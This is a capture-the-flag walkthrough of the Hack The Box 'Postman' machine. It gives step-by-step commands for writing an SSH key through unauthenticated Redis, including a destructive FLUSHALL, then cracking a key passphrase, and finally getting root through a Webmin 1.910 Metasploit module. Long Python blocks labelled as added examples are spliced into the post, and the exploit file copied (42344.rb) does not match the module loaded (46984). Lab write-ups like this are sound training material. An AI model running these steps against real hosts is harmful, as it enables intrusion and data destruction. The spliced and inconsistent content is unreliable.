Hack The Box - Postman server



Postman is a retired (14.3.2020) Linux machine on the Hack The Box penetration testing lab. It was rated Easy, which makes it an ideal candidate for beginners to start with. I am going to try to write the entire walkthrough as detailed as possible, so it is clear to everyone what is being done and why.

We will use/learn: nmap, Redis exploitation (writing an SSH key through an unauthenticated Redis instance), Webmin exploitation, SSH key passphrase cracking, SSH login with an RSA private key, Metasploit Framework

Getting User:


Let's start with basic enumeration of the ports and services running on the server with nmap (Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing, as the nmap project describes itself).

For those not familiar with the command I suggest checking this cheat-sheet first: nmap-cheat-sheet



The scan found port 22 (SSH), port 80 (HTTP), port 6379 (Redis) and port 10000 (Webmin). The two interesting ones are Redis, which has no authentication at all unless requirepass is configured, and Webmin, which runs as root.

For SSH we do not have any credentials and the web page on port 80 revealed nothing, so let's check the Redis service. Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker. It supports data structures such as strings, hashes, lists, sets, sorted sets with range queries, bitmaps, hyperloglogs, geospatial indexes with radius queries and streams (description from the Redis project).

One of the first hits on Google is Rapid7's Metasploit module (redis_unauth_exec), but let's ignore it for the moment and try to get in manually. There is a pretty good guide on attacking a Redis service in the Kali Linux - An Ethical Hacker's Cookbook 2nd Edition book (btw you can download it in the PDF format):

So let's follow the procedure further. After confirming with telnet that port 6379 accepts connections (Redis speaks a plain-text protocol, so you can type a command such as INFO straight into the telnet session and get a readable answer), we run the following:


Create the RSA key:
ssh-keygen -t rsa -C pk@pk.pk

Enter the file where we want to save it (in my case /root/Downloads/HTB/postman.htb/postman_rsa)

Install the Redis CLI. Use the following command to do so:
sudo apt-get install redis-tools

Go back to the generated public key and pad it with a couple of newlines before and after:
(echo -e "\n\n"; cat postman_rsa.pub; echo -e "\n\n") > ./redis.txt

The padding is not random data. Redis's SAVE writes a binary RDB dump, and sshd reads authorized_keys line by line, ignoring every line it cannot parse. The extra newlines make sure our key ends up on a line of its own, with the binary RDB header and trailer on separate, ignored lines. redis.txt is now our key file with those newlines.

Flush the existing keys, so that our value is the only thing that ends up in the dump (note that FLUSHALL wipes every database on the instance; on a real engagement this is destructive and has to be agreed with the client first):
redis-cli -h 10.10.10.160 -p 6379 flushall

Store the padded public key as the value of the Redis key bb (-x makes redis-cli read the last argument from stdin):
cat redis.txt | redis-cli -h 10.10.10.160 -p 6379 -x set bb

Now open an interactive redis-cli session, so we can point the dump at the redis user's SSH directory:
redis-cli -h 10.10.10.160 -p 6379

And then run:
config get dir (shows the directory Redis saves its dump to; the redis user's home directory is /var/lib/redis, so the target is /var/lib/redis/.ssh)

Change the dump directory to /var/lib/redis/.ssh:
config set dir /var/lib/redis/.ssh

Set the dump filename to authorized_keys and trigger a save. SAVE writes the dump, and with it our padded public key, to /var/lib/redis/.ssh/authorized_keys. This only works because the Redis process has write access to that directory:
config set dbfilename "authorized_keys"
save
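To make the mechanics of the steps above concrete, here is an added example (not code from the original post or from Redis/OpenSSH): it encodes the same command sequence in RESP, the protocol redis-cli speaks, and then shows with a constructed stand-in for the RDB dump why the newline padding is what makes sshd accept the key. The public key, the RDB bytes and the sshd parser are all simplified, constructed stand-ins; real RDB files are length-prefixed and real sshd also accepts an options= prefix.

```python
import base64
import binascii

# Constructed public key: the shape of an ssh-rsa line (type, base64 blob,
# comment), but the blob is NOT a real RSA key.
B64 = base64.b64encode(b"constructed demo blob, not a real RSA key")
PUBKEY = b"ssh-rsa " + B64 + b" pk@pk.pk"

KEY_TYPES = (b"ssh-rsa", b"ssh-ed25519", b"ecdsa-sha2-nistp256",
             b"ecdsa-sha2-nistp384", b"ecdsa-sha2-nistp521")


def resp(*args) -> bytes:
    """Encode one command in RESP (array of bulk strings), the wire
    protocol redis-cli uses; this is why a plain telnet session works too."""
    out = b"*%d\r\n" % len(args)
    for a in args:
        a = a.encode() if isinstance(a, str) else a
        out += b"$%d\r\n" % len(a) + a + b"\r\n"
    return out


def pad_key(pubkey: bytes) -> bytes:
    """Same as: (echo -e "\\n\\n"; cat key.pub; echo -e "\\n\\n") > redis.txt"""
    return b"\n\n" + pubkey.strip() + b"\n\n"


def attack_commands(pubkey: bytes, target_dir: str = "/var/lib/redis/.ssh",
                    redis_key: str = "bb") -> list:
    """The sequence typed into redis-cli in the post, as RESP frames.
    FLUSHALL is destructive: it empties every database on the instance."""
    return [
        resp("FLUSHALL"),
        resp("SET", redis_key, pad_key(pubkey)),
        resp("CONFIG", "SET", "dir", target_dir),
        resp("CONFIG", "SET", "dbfilename", "authorized_keys"),
        resp("SAVE"),
    ]


def fake_rdb(value: bytes) -> bytes:
    """Constructed stand-in for what SAVE writes. A real RDB file is a
    length-prefixed binary format; only the property that matters here is
    reproduced: binary header and trailer bytes containing no newline,
    glued directly onto our value."""
    header = b"REDIS0009\xfa\tredis-ver\x05" + b"5.0.7\xfe\x00\xfb\x01\x00\x00\x02bb"
    trailer = b"\xff\x8d\x1f\xb4\x9c\x21\x77\x03\xe5"
    return header + value + trailer


def _is_base64(blob: bytes) -> bool:
    try:
        base64.b64decode(blob, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def usable_keys(authorized_keys: bytes) -> list:
    """Simplified model of how sshd reads authorized_keys: one key per line,
    blank and comment lines skipped, and any line that does not start with a
    key type followed by base64 is silently ignored."""
    found = []
    for raw in authorized_keys.split(b"\n"):
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        parts = line.split()
        if len(parts) >= 2 and parts[0] in KEY_TYPES and _is_base64(parts[1]):
            found.append(parts[0] + b" " + parts[1])
    return found


if __name__ == "__main__":
    # Without padding the key shares a line with the RDB header: sshd finds
    # nothing. With padding it sits on its own line and is accepted.
    print("unpadded:", usable_keys(fake_rdb(PUBKEY)))
    print("padded  :", usable_keys(fake_rdb(pad_key(PUBKEY))))
    print("frames  :", len(attack_commands(PUBKEY)))
```

The same padding trick applies whenever a file is written through a store that adds its own framing (RDB here): as long as the consumer parses line by line and skips garbage, a newline on each side of the payload is enough. Remember that the resulting authorized_keys is still full of binary junk and that FLUSHALL destroyed whatever the instance held, so note both for the report and clean up afterwards.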



Now that our public key sits in the redis user's authorized_keys, we should be able to connect via SSH with the matching private key as user redis:



Now that we are connected as user redis, we can check what is running on the server, which other users are configured and how we could exploit the server further. A great tool for this is the LinEnum.sh script (Download here), which I run on all Linux servers. In 9 out of 10 cases it helps you find a way in (by identifying SUID files, processes or commands runnable with sudo, etc.). But that is not necessary on the Postman server.

A quick check of the /opt directory reveals a backup of a private RSA key. We also check which users are configured on the server by listing /home:



So I think it is safe to assume that the backup RSA key belongs to user Matt. But as you can see, it is encrypted (passphrase-protected), so we need the passphrase first. We download it and google how to crack an RSA key passphrase with John the Ripper or Hashcat. I found this article extremely helpful: SSH_tricks



These 5 lines tell us exactly what we need to do. After downloading the sshng2john Python script, we convert the encrypted key into a hash format that John the Ripper understands and crack it with a wordlist, which gives us the passphrase (sshng2john does not decrypt anything itself; John does the guessing).
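As an added example (not code from the post, from sshng2john or from OpenSSH), here is what the "is it encrypted, and with what" check behind sshng2john looks like: it tells the two private key formats apart and pulls out the cipher, IV or bcrypt KDF parameters that the cracker's hash representation is built from. The three sample keys are constructed placeholders with no real key material; the exact hash string John expects is not reproduced here.

```python
import base64
import struct

# Constructed sample 1: traditional PEM key with the RFC 1421 headers that
# OpenSSL / older ssh-keygen add when a passphrase is set. Body is a
# placeholder, not real key material.
TRADITIONAL_ENCRYPTED = b"""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,73E9CEFBCCF5287C

Y29uc3RydWN0ZWQgcGxhY2Vob2xkZXIgYm9keSwgbm90IGEgcmVhbCBrZXk=
-----END RSA PRIVATE KEY-----
"""

# Constructed sample 2: the same kind of key without a passphrase.
TRADITIONAL_PLAIN = b"""-----BEGIN RSA PRIVATE KEY-----
Y29uc3RydWN0ZWQgcGxhY2Vob2xkZXIgYm9keSwgbm90IGEgcmVhbCBrZXk=
-----END RSA PRIVATE KEY-----
"""


def _string(b: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(b)) + b


SALT = bytes(range(16))  # constructed bcrypt salt
ROUNDS = 16


def build_openssh_v1(cipher: bytes, kdf: bytes, salt: bytes, rounds: int) -> bytes:
    """Constructed new-format ("openssh-key-v1") key (sample 3). Only the
    header fields matter here; the key blobs are dummies."""
    kdfopts = _string(salt) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    body = (b"openssh-key-v1\x00" + _string(cipher) + _string(kdf) + _string(kdfopts)
            + struct.pack(">I", 1) + _string(b"dummy public key blob")
            + _string(b"dummy (encrypted) private section"))
    b64 = base64.b64encode(body)
    wrapped = b"\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + wrapped
            + b"\n-----END OPENSSH PRIVATE KEY-----\n")


OPENSSH_ENCRYPTED = build_openssh_v1(b"aes256-ctr", b"bcrypt", SALT, ROUNDS)


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_private_key(pem: bytes) -> dict:
    """Return the format, whether a passphrase is needed, and the cipher/KDF
    parameters a cracker would need."""
    lines = [l.strip() for l in pem.splitlines() if l.strip()]
    if lines[0] == b"-----BEGIN OPENSSH PRIVATE KEY-----":
        body = base64.b64decode(b"".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not body.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(magic)
        cipher, off = _read_string(body, off)
        kdf, off = _read_string(body, off)
        kdfopts, off = _read_string(body, off)
        info = {"format": "openssh-v1", "cipher": cipher.decode(),
                "kdf": kdf.decode(), "encrypted": cipher != b"none"}
        if kdf == b"bcrypt":
            salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
            info["salt"] = salt.hex()
            info["rounds"] = rounds
        return info
    # Traditional PEM: encryption is announced by RFC 1421 headers.
    info = {"format": "pem", "encrypted": False}
    for line in lines[1:-1]:
        if line.startswith(b"Proc-Type:") and b"ENCRYPTED" in line:
            info["encrypted"] = True
        elif line.startswith(b"DEK-Info:"):
            cipher, iv = line.split(b":", 1)[1].strip().split(b",", 1)
            info["cipher"] = cipher.decode()
            info["iv"] = iv.decode()
    return info


if __name__ == "__main__":
    for name, key in [("traditional, encrypted", TRADITIONAL_ENCRYPTED),
                      ("traditional, plain", TRADITIONAL_PLAIN),
                      ("openssh-v1, encrypted", OPENSSH_ENCRYPTED)]:
        print(name, "->", inspect_private_key(key))
```

The practical use: a key with "encrypted": False can be used with ssh -i directly, a traditional PEM with a DEK-Info header cracks fast (one MD5-based key derivation per guess), while an openssh-v1 key with the bcrypt KDF and a high round count is orders of magnitude slower per guess, which changes how big a wordlist you can afford.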

 

However, when we try to log in via SSH as Matt, the connection is closed immediately, even with the private key. A rejection that early usually means sshd itself refuses the user (for example an AllowUsers/DenyUsers rule in sshd_config), not that the credentials are wrong. So let's simply switch user from redis to Matt with su, reusing the cracked passphrase as the account password:




And that works! We are logged in as Matt and can grab the user flag from user.txt:




Getting Root: 

The initial enumeration with nmap showed us that port 10000 is opened and it is running a Webmin. Webmin is a web-based system configuration tool for Unix-like systems, although recent versions can also be installed and run on Windows (Wikipedia). 

So let's open the Webmin app in the browser. http://postman:10000 shows us a custom error message:


So let's do what the message tells us and try it over HTTPS:



And we get the Login screen to Webmin. Because we have Matt's credentials (Matt/computer2008), let's try them in here: 




And we can see that the Webmin version is 1.910. Now let's take a shortcut and use Metasploit (I am going to add the manual exploitation later)...

First let's check for known exploits against this version with searchsploit (it searches the local Exploit-DB copy, not Metasploit's own module database): searchsploit 1.910


And it finds a remote command execution exploit written as a Ruby Metasploit module. It is a standalone file from Exploit-DB, not yet part of our Metasploit installation, so we need to put it where msfconsole will load it:


As first we have to create the MSF webapps exploit directory : 
mkdir -p /root/.msf4/modules/exploits/cgi/webapps/ 

and copy the exploit there: 
cp /usr/share/exploitdb/exploits/cgi/webapps/42344.rb /root/.msf4/modules/exploits/cgi/webapps/

Then we run updatedb so that locate and searchsploit can find the file. Note that Metasploit does not read that index: msfconsole loads every module under ~/.msf4/modules when it starts (run reload_all if it is already open). Once all that is done, we can start the Metasploit Framework and try to get in (the module name is the file name without the .rb extension, so it has to match the file you copied):

msfconsole
msf5 > use exploit/cgi/webapps/46984

and list the options we need to set in order to execute the attack:


We need to set the remote host (RHOSTS), USERNAME and PASSWORD (Matt's credentials from above) and our local host (LHOST) for the reverse connection. SSL defaults to false, and from our first login we know that Webmin only talks HTTPS, so we set SSL to true.



And we have a remote session as root (Webmin runs as root, so any command execution through it is root), so we can grab the root flag from /root/root.txt, or create a new user with root privileges and log in via SSH, etc.


I did not really learn anything new by cracking this box, but it was certainly fun.
